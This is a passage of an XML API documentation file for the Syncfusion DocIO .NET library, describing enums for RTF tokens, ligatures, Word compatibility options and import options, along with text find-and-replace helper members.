        <member name="F:Syncfusion.DocIO.DLS.OleObjectType.OpenOfficeText">
            <summary>
            OpenOffice Text.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.ImageType">
            <summary>
            Specifies the image type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.ImageType.Metafile">
            <summary>
            Meta file.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.ImageType.Bitmap">
            <summary>
            Bitmap.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.RtfTableType">
            <summary>
            Specifies the Rtf table type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.RtfTableType.FontTable">
            <summary>
            Font table collection
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.RtfTableType.ListTable">
            <summary>
            List table collection
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.RtfTableType.ColorTable">
            <summary>
            Color table collection
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.RtfTableType.ListOverrideTable">
            <summary>
            List override collection
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.RtfTableType.StyleSheet">
            <summary>
            Style sheet collection
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.RtfTableType.None">
            <summary>
            No table collection
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.RtfTokenType">
            <summary>
            Specifies the Rtf token type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.RtfTokenType.GroupStart">
            <summary>
            Group start.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.RtfTokenType.GroupEnd">
            <summary>
            Group end.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.RtfTokenType.ControlWord">
            <summary>
            Control word.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.RtfTokenType.Text">
            <summary>
            Text.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.RtfTokenType.TableEntry">
            <summary>
            Table entry.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.RtfTokenType.Unknown">
            <summary>
            Unknown.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.FieldCharType">
            <summary>
            Specifies the type of the field character.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.FieldCharType.Begin">
            <summary>
            Field begin.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.FieldCharType.Seperate">
            <summary>
            Field separator.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.FieldCharType.End">
            <summary>
            Field end.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.FieldCharType.Unknown">
            <summary>
            Field unknown.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.FieldCharType.SimpleField">
            <summary>
            simple field.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.LigatureType">
            <summary>
            Specifies the ligature type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.LigatureType.None">
            <summary>
            Does not apply any ligatures to the font.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.LigatureType.Standard">
            <summary>
            Applies standard ligatures to the font. Standard ligatures are designed to enhance readability. Standard ligatures in Latin languages include "fi", "fl", and "ff", for example.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.LigatureType.Contextual">
            <summary>
            Applies contextual ligatures to the font. Contextual ligatures are often designed to enhance readability, but may also be solely ornamental. Contextual ligatures may also be contextual alternates.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.LigatureType.StandardContextual">
            <summary>
            Applies standard and contextual ligatures to the font.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.LigatureType.Historical">
            <summary>
            Applies historical ligatures to the font. Historical ligatures are similar to standard ligatures in that they were originally intended to improve the readability of the font, but may look archaic to the modern reader.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.LigatureType.StandardHistorical">
            <summary>
            Applies standard and historical ligatures to the font.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.LigatureType.ContextualHistorical">
            <summary>
            Applies contextual and historical ligatures to the font.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.LigatureType.StandardContextualHistorical">
            <summary>
            Applies standard, contextual, and historical ligatures to the font.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.LigatureType.Discretional">
            <summary>
            Applies discretional ligatures to the font. Discretional ligatures are most often designed to be ornamental at the discretion of the type developer.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.LigatureType.StandardDiscretional">
            <summary>
            Applies standard and discretional ligatures to the font.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.LigatureType.ContextualDiscretional">
            <summary>
            Applies contextual and discretional ligatures to the font.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.LigatureType.StandardContextualDiscretional">
            <summary>
            Applies standard, contextual and discretional ligatures to the font.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.LigatureType.HistoricalDiscretional">
            <summary>
            Applies historical and discretional ligatures to the font.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.LigatureType.StandardHistoricalDiscretional">
            <summary>
            Applies standard historical and discretional ligatures to the font.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.LigatureType.ContextualHistoricalDiscretional">
            <summary>
            Applies contextual, historical, and discretional ligatures to a font.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.LigatureType.All">
            <summary>
            Applies all types of ligatures to the font.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.NumberFormType">
            <summary>
            Specifies the number form type.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.NumberSpacingType">
            <summary>
            Specifies the number spacing type.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.StylisticSetType">
            <summary>
            Specifies the stylistic set type.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.CompatibilityOption">
            <summary>
            Specifies the compatibility types.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CompatibilityOption.NoTabForInd">
            <summary>
              Don't add automatic tab stop for hanging indent.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CompatibilityOption.NoSpaceRaiseLower">
            <summary>
            Don't add extra space for raised/lowered characters.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CompatibilityOption.MapPrintTextColor">
            <summary>
             Print colors as black on noncolor printers.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CompatibilityOption.WrapTrailSpaces">
            <summary>
             Wrap trailing spaces to next line.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CompatibilityOption.NoColumnBalance">
            <summary>
            Don't balance columns for continuous section starts.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CompatibilityOption.ConvMailMergeEsc">
            <summary>
             Treat \" as "" in mail merge data sources.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CompatibilityOption.SuppressSpBfAfterPgBrk">
            <summary>
             Suppress Space Before after a hard page or column break.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CompatibilityOption.SuppressTopSpacing">
            <summary>
             Suppress extra line spacing at top of page.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CompatibilityOption.OrigWordTableRules">
            <summary>
             Combine table borders like Word 5.x for the Macintosh.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CompatibilityOption.TruncDxaExpand">
            <summary>
             Truncate font height.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CompatibilityOption.ShowBreaksInFrames">
            <summary>
             Show hard page or column breaks in frames.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CompatibilityOption.SwapBordersFacingPgs">
            <summary>
             Swap left and right borders on odd facing pages.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CompatibilityOption.LeaveBackslashAlone">
            <summary>
            Convert backslash characters into yen signs.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CompatibilityOption.ExpShRtn">
            <summary>
             Don't expand character spaces on the line ending Shift+Return.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CompatibilityOption.DntULTrlSpc">
            <summary>
              Draw underline on trailing spaces.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CompatibilityOption.DntBlnSbDbWid">
            <summary>
             Balance SBCS characters and DBCS characters.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CompatibilityOption.SuppressTopSpacingMac5">
            <summary>
            Suppress extra line spacing at top of page like Word 5.x for the Macintosh.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CompatibilityOption.F2ptExtLeadingOnly">
            <summary>
            Specifies whether line spacing emulates WordPerfect 5.x line spacing
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CompatibilityOption.PrintBodyBeforeHdr">
            <summary>
            Print body text before header/footer.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CompatibilityOption.NoExtLeading">
            <summary>
            Don't add leading (extra space) between rows of text.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CompatibilityOption.DontMakeSpaceForUL">
            <summary>
            Add space for underline.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CompatibilityOption.MWSmallCaps">
            <summary>
            Use larger small caps like Word 5.x for the Macintosh.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CompatibilityOption.ExtraAfter">
            <summary>
            Suppress extra line spacing like WordPerfect 5.x.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CompatibilityOption.TruncFontHeight">
            <summary>
            Truncate font height.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CompatibilityOption.SubOnSize">
            <summary>
            Substitute fonts based on font size.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CompatibilityOption.PrintMet">
            <summary>
             Use printer metrics to lay out document.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CompatibilityOption.WW6BorderRules">
            <summary>
            Use Word 6.x/95 border rules.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CompatibilityOption.ExactOnTop">
            <summary>
            Don't center "exact line height" lines.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CompatibilityOption.WPSpace">
            <summary>
            Set the width of a space like WordPerfect 5.x.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CompatibilityOption.WPJust">
            <summary>
            Do full justification like WordPerfect 6.x for Windows.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CompatibilityOption.LineWrapLikeWord6">
            <summary>
            Line wrap like Word 6.0.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CompatibilityOption.SpLayoutLikeWW8">
            <summary>
            Lay out autoshapes like Word 97.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CompatibilityOption.FtnLayoutLikeWW8">
            <summary>
            Lay out footnotes like Word 6.x/95/97.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CompatibilityOption.DontUseHTMLParagraphAutoSpacing">
            <summary>
             Don't use HTML paragraph auto spacing.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CompatibilityOption.DontAdjustLineHeightInTable">
            <summary>
              Adjust line height to grid height in the table.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CompatibilityOption.ForgetLastTabAlign">
            <summary>
            Forget last tab alignment.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CompatibilityOption.UseAutospaceForFullWidthAlpha">
            <summary>
            Specifies whether to emulate Word for Windows 95 full-width character spacing
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CompatibilityOption.AlignTablesRowByRow">
            <summary>
            Slign table rows independently.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CompatibilityOption.LayoutRawTableWidth">
            <summary>
            Lay out tables with raw width.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CompatibilityOption.LayoutTableRowsApart">
            <summary>
            Allow table rows to lay out apart.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CompatibilityOption.UseWord97LineBreakingRules">
            <summary>
            Use Word 97 line breaking rules for Asian text.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CompatibilityOption.DontBreakWrappedTables">
            <summary>
             Don't break wrapped tables across pages.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CompatibilityOption.DontSnapToGridInCell">
            <summary>
            Don't snap text to grid inside table with inline objects.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CompatibilityOption.DontAllowFieldEndSelect">
            <summary>
            Select entire field with first or last character.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CompatibilityOption.ApplyBreakingRules">
            <summary>
            Use line-breaking rules.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CompatibilityOption.DontWrapTextWithPunct">
            <summary>
             Don't allow hanging punctuation with character grid.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CompatibilityOption.DontUseAsianBreakRules">
            <summary>
             Don't use Asian rules for line breaks with character grid.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CompatibilityOption.UseWord2002TableStyleRules">
            <summary>
            Use Word 2002 table style rules.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CompatibilityOption.GrowAutoFit">
            <summary>
            Allow tables to extend into margins.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CompatibilityOption.UseNormalStyleForList">
            <summary>
             Use the Normal style instead of the List Paragraph style for bulleted or
              numbered lists.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CompatibilityOption.DontUseIndentAsNumberingTabStop">
            <summary>
             Do not use hanging indent as tab stop for bullets and numbering.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CompatibilityOption.FELineBreak11">
            <summary>
            Use Word 2003 hanging-punctuation rules in Asian langauges.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CompatibilityOption.AllowSpaceOfSameStyleInTable">
            <summary>
            Allow space between paragraphs of the same style in a table.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CompatibilityOption.WW11IndentRules">
            <summary>
            Use Word 2003 indent rules for text next to wrapped objects.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CompatibilityOption.DontAutofitConstrainedTables">
            <summary>
            Do not autofit tables next to wrapped objects.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CompatibilityOption.AutofitLikeWW11">
            <summary>
            Use Microsoft Office Word 2003 table autofit rules.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CompatibilityOption.UnderlineTabInNumList">
            <summary>
            Underline the tab character between the number and the text in numbered lists.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CompatibilityOption.HangulWidthLikeWW11">
            <summary>
            Do not use proportional width for Korean characters.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CompatibilityOption.SplitPgBreakAndParaMark">
            <summary>
            Split apart page break and paragraph mark.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CompatibilityOption.DontVertAlignCellWithSp">
            <summary>
            Specifies whether to not vertically align cells containing floating objects
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CompatibilityOption.DontBreakConstrainedForcedTables">
            <summary>
            Specifies whether to not break table rows around floating tables
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CompatibilityOption.DontVertAlignInTxbx">
            <summary>
            Specifies whether to ignore vertical alignment in text boxes
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CompatibilityOption.Word11KerningPairs">
            <summary>
            Specifies whether to use ANSI kerning pairs from fonts instead of the Unicode kerning pair info
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CompatibilityOption.CachedColBalance">
            <summary>
            Specifies whether to use cached paragraph information for column balancing
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CompatibilityOption.overrideTableStyleFontSizeAndJustification">
            <summary>
            specifies whether to apply the additional preceding rules when determining the font size and justification of text within tables.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CompatibilityOption.enableOpenTypeFeatures">
            <summary>
            specifies whether the preceding features are to be used when displaying the font.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CompatibilityOption.doNotFlipMirrorIndents">
            <summary>
            specifies whether to swap indentation values when displaying paragraphs.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CompatibilityOption.differentiateMultirowTableHeader">
            <summary>
            conditional formatting of table row headers does apply separately to multi-row table headers 
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.CompatibilityMode">
            <summary>
            Specifies the compatibility mode that uses when opening a document.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CompatibilityMode.Word2003">
            <summary>
            Features new to Word 2007 and later are disabled in this mode.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CompatibilityMode.Word2007">
            <summary>
            Features new to Word 2010 and later are disabled in this mode.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CompatibilityMode.Word2010">
            <summary>
            All Word 2010 features are enabled.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CompatibilityMode.Word2013">
            <summary>
            Default. All Word 2013 features are enabled. Also Word 2016 have similar features of Word 2013 and it doesn't have any difference.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.ImportOptions">
            <summary>
            Specifies the Import options.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.ImportOptions.KeepSourceFormatting">
            <summary>
            Imports the contents from the source document, applies the default style (Normal), and preserves all other formatting as direct formatting in order to preserve the contents as in source document.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.ImportOptions.MergeFormatting">
            <summary>
            Imports the contents of the source document to the destination document, and applies the formatting of surrounding content to the destination document.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.ImportOptions.KeepTextOnly">
            <summary>
            Imports only the text from the source document to the destination document.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.ImportOptions.UseDestinationStyles">
            <summary>
            Imports the contents of the source document to the destination document, and applies the styles present in the destination document, or imports the source style to the destination document when there is no style with the same name in the destination document.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.WarningType">
            <summary>
            Specifies the warning type element names
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WarningType.DateTime">
            <summary>
            Date and Time
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WarningType.Annotation">
            <summary>
            Annotation reference
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WarningType.Comment">
            <summary>
            Comment 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WarningType.CurrentSectionNumber">
            <summary>
            Current section number
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WarningType.CustomShape">
            <summary>
            Custom shape
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WarningType.GroupShape">
            <summary>
            Group shape
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WarningType.LineNumber">
            <summary>
            Line number
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WarningType.Math">
            <summary>
            Mathematical text
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WarningType.OLEObject">
            <summary>
            OLE object
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WarningType.PageNumber">
            <summary>
            Page number
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WarningType.Shape">
            <summary>
            Shape
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WarningType.PrintMergeHelperField">
            <summary>
            Print merge helper field
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WarningType.SmartArt">
            <summary>
            SmartArt diagram
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WarningType.TrackChanges">
            <summary>
            Track changes
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WarningType.Textbox">
            <summary>
            Text box 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WarningType.WordArt">
            <summary>
            WordArt
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WarningType.Watermark">
            <summary>
            Watermark
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.AbsoluteTabRelation">
            <summary>
            Document's AbsoluteTab Relation.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AbsoluteTabRelation.Margin">
            <summary>
            Relative to margin.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AbsoluteTabRelation.Indent">
            <summary>
            Relative to indent.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.AbsoluteTabAlignment">
            <summary>
            Document's AbsoluteTab Relation.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AbsoluteTabAlignment.Left">
            <summary>
            left alignment.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AbsoluteTabAlignment.Center">
            <summary>
            center alignment.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AbsoluteTabAlignment.Right">
            <summary>
            right alignment.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.FindUtils.DEF_WHOLE_WORD_BEFORE">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.FindUtils.IsPatternEmpty(System.Text.RegularExpressions.Regex)">
            <summary>
            Determines whether [is pattern empty] [the specified pattern].
            </summary>
            <param name="pattern">The pattern.</param>
            <returns>
            	<c>true</c> if it is the specified pattern empty, set to <c>true</c>.
            </returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.FindUtils.StringToRegex(System.String,System.Boolean,System.Boolean)">
            <summary>
            Strings to regex.
            </summary>
            <param name="given">The given.</param>
            <param name="caseSensitive">if it is case sensitive, set to <c>true</c>.</param>
            <param name="wholeWord">if it is specified to search a whole word, set to <c>true</c>.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.FindUtils.GetStartRangeIndex(Syncfusion.DocIO.DLS.WParagraph,System.Int32,Syncfusion.DocIO.DLS.WTextRange@)">
            <summary>
            Gets the start index of the range.
            </summary>
            <param name="para">The paragraph.</param>
            <param name="start">The start.</param>
            <param name="tr">The Text Range.</param>
            <returns></returns>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.TextFinder">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.TextFinder.m_instance">
            <summary>
            TextFinder variable.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextFinder.Find(Syncfusion.DocIO.DLS.WParagraph,System.Text.RegularExpressions.Regex,System.Boolean)">
            <summary>
            Finds the text by specified pattern.
            </summary>
            <param name="para">The paragraph.</param>
            <param name="pattern">The pattern.</param>
            <param name="onlyFirstMacth">if it is only first macth, set to <c>true</c>.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextFinder.FindInItems(Syncfusion.DocIO.DLS.WParagraph,System.Text.RegularExpressions.Regex,System.Boolean,Syncfusion.DocIO.DLS.TextSelectionList)">
            <summary>
            Finds the in items.
            </summary>
            <param name="para">The paragraph.</param>
            <param name="pattern">The pattern.</param>
            <param name="onlyFirstMacth">if it is only first match, set to <c>true</c>.</param>
            <param name="selections">The selections.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextFinder.GetTextBody(Syncfusion.DocIO.DLS.ParagraphItem)">
            <summary>
            Gets the text body of paragraph item.
            </summary>
            <param name="item">The item.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextFinder.FindSingleLine(Syncfusion.DocIO.DLS.WTextBody,System.Text.RegularExpressions.Regex)">
            <summary>
            Finds the text by specified pattern in single-line mode.
            </summary>
            <param name="textBody">The text body.</param>
            <param name="pattern">The pattern.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextFinder.FindSingleLine(Syncfusion.DocIO.DLS.WTextBody,System.Text.RegularExpressions.Regex,System.Int32,System.Int32)">
            <summary>
            Finds the text by specified pattern in single-line mode.
            </summary>
            <param name="textBody">The text body.</param>
            <param name="pattern">The pattern.</param>
            <param name="startIndex">The start index.</param>
            <param name="endIndex">The end index.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextFinder.FindInItems(Syncfusion.DocIO.DLS.WParagraph,System.Text.RegularExpressions.Regex,System.Int32,System.Int32)">
            <summary>
            Finds the in items.
            </summary>
            <param name="para">The paragraph.</param>
            <param name="pattern">The pattern.</param>
            <param name="startIndex">The start index.</param>
            <param name="endIndex">The end index.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextFinder.FindSingleLine(System.Text.RegularExpressions.Regex)">
            <summary>
            Finds the single-line text by pattern.
            </summary>
            <param name="pattern">The pattern.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextFinder.FindSingleLine(Syncfusion.DocIO.DLS.WTable,System.Text.RegularExpressions.Regex)">
            <summary>
            Finds the text by specified pattern in table using single-line mode.
            </summary>
            <param name="tables">The tables.</param>
            <param name="pattern">The pattern.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextFinder.FindSingleLine(System.Collections.Generic.List{Syncfusion.DocIO.DLS.WParagraph},System.Text.RegularExpressions.Match)">
            <summary>
            Forms the list of text selections.
            </summary>
            <param name="paragraphs">The paragraphs.</param>
            <param name="match">The match.</param>
            <returns></returns>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.TextFinder.Instance">
            <summary>
            Gets the instance of TextReplacer.
            </summary>
            <value>The instance.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.TextFinder.SingleLinePCol">
            <summary>
            
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.TextReplacer">
            <summary>
            Class provides replacing method for the specified paragraph
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.TextReplacer.m_instance">
            <summary>
            TextReplacer variable.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextReplacer.Replace(Syncfusion.DocIO.DLS.WParagraph,System.Text.RegularExpressions.Regex,System.String)">
            <summary>
            Replaces the specified paragraph.
            </summary>
            <param name="para">The paragraph.</param>
            <param name="pattern">The pattern.</param>
            <param name="replacement">The replace.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextReplacer.ReplaceInItems(Syncfusion.DocIO.DLS.WParagraph,System.Text.RegularExpressions.Regex,System.String)">
            <summary>
            Replaces the in items.
            </summary>
            <param name="para">The paragraph.</param>
            <param name="pattern">The pattern.</param>
            <param name="replacement">The replacement.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextReplacer.ReplaceSingleLine(Syncfusion.DocIO.DLS.TextSelection[],System.String)">
            <summary>
            Replaces the single line.
            </summary>
            <param name="findText">The find text.</param>
            <param name="replacement">The replacement.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextReplacer.ReplaceSingleLine(Syncfusion.DocIO.DLS.TextSelection[],Syncfusion.DocIO.DLS.TextSelection)">
            <summary>
            Replaces the single=line selection with TextSelection.
            </summary>
            <param name="findText">Single-line selection to replace.</param>
            <param name="replacement">The replacement.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextReplacer.ReplaceSingleLine(Syncfusion.DocIO.DLS.TextSelection[],Syncfusion.DocIO.DLS.TextBodyPart)">
            <summary>
            Replaces the single-line  selection with TextBodypart.
            </summary>
            <param name="findText">Single-line selection to replace.</param>
            <param name="replacement">The replacement.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextReplacer.RemoveOwnerPara(Syncfusion.DocIO.DLS.TextSelection)">
            <summary>
            Removes the owner paragraph from selection in case paragraph is empty.
            </summary>
            <param name="selection">The selection.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextReplacer.RemoveInternalItems(Syncfusion.DocIO.DLS.WParagraph,System.Int32,System.Int32,Syncfusion.DocIO.DLS.WTextRange@)">
            <summary>
            Removes the internal items.
            </summary>
            <param name="para">The paragraph.</param>
            <param name="end"></param>
            <param name="startIndex">Start index of the range.</param>
            <param name="nextTr"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextReplacer.CorrectNextItems(Syncfusion.DocIO.DLS.WParagraph,System.Int32,System.Int32)">
            <summary>
            Corrects the next items.
            </summary>
            <param name="para">The paragraph.</param>
            <param name="startIndex">The start index.</param>
            <param name="offset">The offset.</param>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.TextReplacer.Instance">
            <summary>
            Gets the instance of TextReplacer.
            </summary>
            <value>The instance.</value>
        </member>
        <member name="T:Syncfusion.Layouting.Exceptions.LayoutException">
            <summary>
            The exception that is thrown when a layouting error occurs.
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.Exceptions.LayoutException.DEF_MESSAGE">
            <summary>
            Default exception message.
            </summary>
        </member>
